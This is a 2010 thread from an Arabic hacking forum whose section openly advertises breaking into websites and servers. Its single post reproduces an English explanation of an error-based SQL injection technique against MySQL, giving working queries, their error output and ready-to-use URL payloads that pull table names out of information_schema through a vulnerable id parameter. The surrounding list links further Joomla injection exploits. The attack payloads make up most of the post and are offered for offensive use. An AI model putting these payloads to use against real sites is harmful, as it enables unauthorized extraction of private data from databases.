|
|
|
|
 |
 |
 |
 |
 |
|
|
 |
|
|
 |
 |
|
|||||||
 |
 |
 |
| أمن المواقع والسيرفرات اختراق المواقع , اختراق المنتديات , برنامج اختراق , اختراق السيرفرات , ادوات اختراق , برامج اختراق , تعليم اختراق , شروحات اختراق , دورات اختراق , شل , shell , اخراق سيرفر وندز |
 |
|
|
LinkBack | أدوات الموضوع |
02-09-2010, 10:27 AM
|
رقم المشاركة : 1 (permalink) | |
|
|
وداعاً Blind SQL وساعات الانتظار الممله :)
السلام عليكم ورحمه الله وبركاته At the turn of the last year, Qwazar has got a universal technique of exploitation of Blind SQL Injection vulnerabilities in applications operating under MySQL database from the depths of antichat (I wonder what else can be found in these depths). It should be mentioned that the proposed technique is rather complicated and opaque. Here is an example of applying this universal approach to MySQL>=5.0: mysql> select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x; ERROR 1062 (23000): Duplicate entry '5.0.841' for key 1 mysql> select 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); ERROR 1062 (23000): Duplicate entry '5.0.841' for key 1 If the table name is unknown, which is possible for MySQL < 5.0, then one has to use more complex queries based on the function rand(). It means that we will often fail to obtain the necessary data with one http query. mysql> select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1); ... 1 row in set (0.00 sec) ... mysql> select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1); ERROR 1062 (23000): Duplicate entry '5.0.84:0' for key 1 Here is an example of practical use of the method for database structure restoration: h t t p://se rve r/?id=(1)and(select+1+from(select+count(*),concat((s elect+table_name+from+information_schema.tables+li mit+0,1),floor(rand(0)*2))x+from+information_schem a.tables+group+by+x)a)-- h t t p://se rve r/?id=(1)and(select+1+from(select+count(*),concat((s elect+table_name+from+information_schema.tables+li mit+1,1),floor(rand(0)*2))x+from+information_schem a.tables+group+by+x)a)-- ... The technique proposed by Qwazar is applicable to all MySQL versions including 3.x, which still can be found in the Global Network. However, taking into consideration the fact that sub-queries were implemented in MySQL v. 4.1, application of the described method to earlier versions becomes much more difficult. |
|
    
|
|
| الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1) | |
| أدوات الموضوع | |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| joomla component com_jinc (newsid) Blind SQL Injection Vulnerability | HaCkEr SToOop | مكتبة الثغرات | 1 | 02-07-2010 07:53 PM |
| #joomla component com_mytube (user_id) Blind SQL Injection Vulnerability | HaCkEr SToOop | مكتبة الثغرات | 2 | 02-07-2010 07:52 PM |
| كتاب يشرح أساسيات Blind SQL | AL AL | أمن المواقع والسيرفرات | 5 | 01-24-2010 03:33 AM |
| دورة في استغلال ثغرات Blind Sql Injection | هاكر فاشل | أمن المواقع والسيرفرات | 3 | 10-12-2009 08:39 PM |
| CascadianFAQ = 4.1 (index.php) Remote Blind SQL Injection Vulnerability | MasterFouad | مكتبة الثغرات | 1 | 02-14-2007 02:18 AM |
|
روابط مهمة |
أقسام المنتدى |
||||
|
|
|
 |
 |
)ا
رد: وداعاً Blind SQL وساعات الانتظار الممله :)
